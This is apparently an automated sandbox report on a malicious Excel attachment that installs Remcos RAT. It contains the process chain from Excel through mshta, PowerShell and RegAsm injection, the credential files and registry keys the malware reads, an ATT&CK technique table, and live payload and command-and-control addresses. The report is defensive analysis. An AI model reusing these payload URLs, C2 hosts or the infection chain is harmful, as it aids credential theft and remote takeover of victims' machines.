                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: ESMTPPassword, 23_2_004033F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword, 23_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword, 23_2_00402DB3
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2080, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe, 17_2_0040569A
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 121 Scripting | Valid Accounts | 11 Native API | 121 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                Email Addresses | DNS Server | Domain Accounts | 223 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Install Root Certificate | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 21 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 DLL Side-Loading | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 111 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | 4 PowerShell | Network Logon Script | 422 Process Injection | 1 Bypass User Account Control | LSA Secrets | 39 System Information Discovery | SSH | 4 Clipboard Data | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 3 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 422 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1508122
Sample: RFQ_0230909024SEPT.xla.xlsx
Startdate: 09/09/2024
Architecture: WINDOWS
Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures

Process tree (network contacts, dropped files and signatures are listed under the process they were attributed to):

• EXCEL.EXE (started)
  Network: 185.235.137.223 (ports 49164, 49166, 49167), AFRARASAIR, Iran (ISLAMIC Republic Of); zeep.ly 95.217.202.210 (ports 443, 49163, 49165), HETZNER-ASDE, Germany
  Dropped: C:\Users\...\~$RFQ_0230909024SEPT.xla.xlsx (data); C:\Users\...\IEnetcateudpationprocess[1].hta (HTML)
  Signatures: Microsoft Office drops suspicious files
  • mshta.exe (started)
    Network: zeep.ly
    Signatures: Suspicious command line found; PowerShell case anomaly found
    • cmd.exe (started)
      Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
      • powershell.exe (started)
        Dropped: C:\Users\...\pictureupdatedwithnewqualit.vbS (Unicode); C:\Users\user\AppData\...\sepiowy3.cmdline (Unicode)
        Signatures: Suspicious powershell command line found; Installs new ROOT certificates; Suspicious execution chain found
        • wscript.exe (started)
          Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
          • powershell.exe (started)
            Signatures: Suspicious powershell command line found
            • powershell.exe (started)
              Network: ia601706.us.archive.org 207.241.227.96 (ports 443, 49168), INTERNET-ARCHIVEUS, United States
              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
              • RegAsm.exe (started)
                Network: camzeroconnect.duckdns.org; camzeroconnect.duckdns.org 192.3.101.29 (ports 14645, 49170, 49171), AS-COLOCROSSINGUS, United States; geoplugin.net 178.237.33.50 (ports 49172, 80), ATOM86-ASATOM86NL, Netherlands
                Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Uses dynamic DNS services (camzeroconnect.duckdns.org)
                • RegAsm.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
                • RegAsm.exe (started): Tries to harvest and steal browser information (history, passwords, etc)
                • RegAsm.exe (started)
                • 5 other processes
              • RegAsm.exe (started): Contains functionality to bypass UAC (CMSTPLUA); Tries to steal Mail credentials (via file registry); Contains functionalty to change the wallpaper; 5 other signatures
              • RegAsm.exe (started)
        • csc.exe (started)
          Dropped: C:\Users\user\AppData\Local\...\sepiowy3.dll (PE32)
          • cvtres.exe (started)

Source | Detection | Scanner | Label
RFQ_0230909024SEPT.xla.xlsx | 13% | ReversingLabs |
RFQ_0230909024SEPT.xla.xlsx | 100% | Joe Sandbox ML |

No Antivirus matches
Source | Detection | Scanner | Label
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | 0% | Avira URL Cloud | safe
https://zeep.ly/c | 0% | Avira URL Cloud | safe
http://www.nirsoft.netX | 0% | Avira URL Cloud | safe
http://b.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe
http://acdn.adnxs.com/ast/ast.js | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta4 | 0% | Avira URL Cloud | safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | 0% | Avira URL Cloud | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | Avira URL Cloud | safe
http://www.imvu.com/uK | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | Avira URL Cloud | safe
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta | 0% | Avira URL Cloud | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | Avira URL Cloud | safe
http://185.235.137.223 | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | 0% | Avira URL Cloud | safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://go.micros | 0% | Avira URL Cloud | safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | 0% | Avira URL Cloud | safe
http://cache.btrll.com/default/Pix-1x1.gif | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htasdVpl(C | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp/C | 0% | Avira URL Cloud | safe
http://o.aolcdn.com/ads/adswrappermsni.js | 0% | Avira URL Cloud | safe
http://185.235.137.223pB7 | 0% | Avira URL Cloud | safe
http://www.msn.com/?ocid=iehp | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Avira URL Cloud | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Avira URL Cloud | safe
http://static.chartbeat.com/js/chartbeat.js | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | 0% | Avira URL Cloud | safe
http://go.cr | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta... | 0% | Avira URL Cloud | safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | Avira URL Cloud | safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Avira URL Cloud | safe
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htapVpl( | 0% | Avira URL Cloud | safe
camzeroconnect.duckdns.org | 100% | Avira URL Cloud | malware
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | 0% | Avira URL Cloud | safe
http://crl.entrust.net/server1.crl0 | 0% | Avira URL Cloud | safe
http://185.235.137.223/ | 0% | Avira URL Cloud | safe
https://www.ccleaner.com/go/app_cc_pro_trialkey | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org/2/items/new_image_ | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htaC: | 0% | Avira URL Cloud | safe
https://zeep.ly/ | 0% | Avira URL Cloud | safe
http://www.imvu.com | 0% | Avira URL Cloud | safe
https://contextual.media.net/8/nrrV73987.js | 0% | Avira URL Cloud | safe
http://185.235.137.223/200/pictureupdatedwithnewquality.tIF | 0% | Avira URL Cloud | safe
http://185.235.137.223/200/pictu | 0% | Avira URL Cloud | safe
https://contextual.media.net/ | 0% | Avira URL Cloud | safe
http://185.235.137.223/200/pictureupdatedwithnewquality.tIFp | 0% | Avira URL Cloud | safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | 0% | Avira URL Cloud | safe
http://185.235H | 0% | Avira URL Cloud | safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | 0% | Avira URL Cloud | safe
http://www.msn.com/ | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
http://185.235.137.223/200/NRSCER.txt | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | 0% | Avira URL Cloud | safe
https://ia601706.us.archive.org | 0% | Avira URL Cloud | safe
https://zeep.ly/yDfvh | 0% | Avira URL Cloud | safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | 0% | Avira URL Cloud | safe
http://185.235.137.223/200/Nh | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htajVpl( | 0% | Avira URL Cloud | safe
http://cdn.at.atwola.com/_media/uac/msn.html | 0% | Avira URL Cloud | safe
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htahttp://185.235.137.223/xampp/ceo/IEnetc | 0% | Avira URL Cloud | safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | 0% | Avira URL Cloud | safe
https://secure.comodo.com/CPS0 | 0% | Avira URL Cloud | safe
http://www.msn.com/advertisement.ad.js | 0% | Avira URL Cloud | safe
https://policies.yahoo.com/w3c/p3p.xml | 0% | Avira URL Cloud | safe
http://crl.entrust.net/2048ca.crl0 | 0% | Avira URL Cloud | safe
http://www.ebuddy.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
camzeroconnect.duckdns.org | 192.3.101.29 | true | true | | unknown
zeep.ly | 95.217.202.210 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
ia601706.us.archive.org | 207.241.227.96 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta | true | Avira URL Cloud: safe | unknown
camzeroconnect.duckdns.org | true | Avira URL Cloud: malware | unknown
http://185.235.137.223/200/pictureupdatedwithnewquality.tIF | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
http://185.235.137.223/200/NRSCER.txt | true | Avira URL Cloud: safe | unknown
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | true | Avira URL Cloud: safe | unknown
https://zeep.ly/yDfvh | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://b.scorecardresearch.com/beacon.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta4 | mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ast/ast.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.netX | RegAsm.exe, 00000015.00000002.515513667.0000000000203000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zeep.ly/c | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.com/uK | RegAsm.exe, 0000001A.00000002.511865097.00000000003FC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | RegAsm.exe, 00000015.00000002.516533065.0000000002378000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
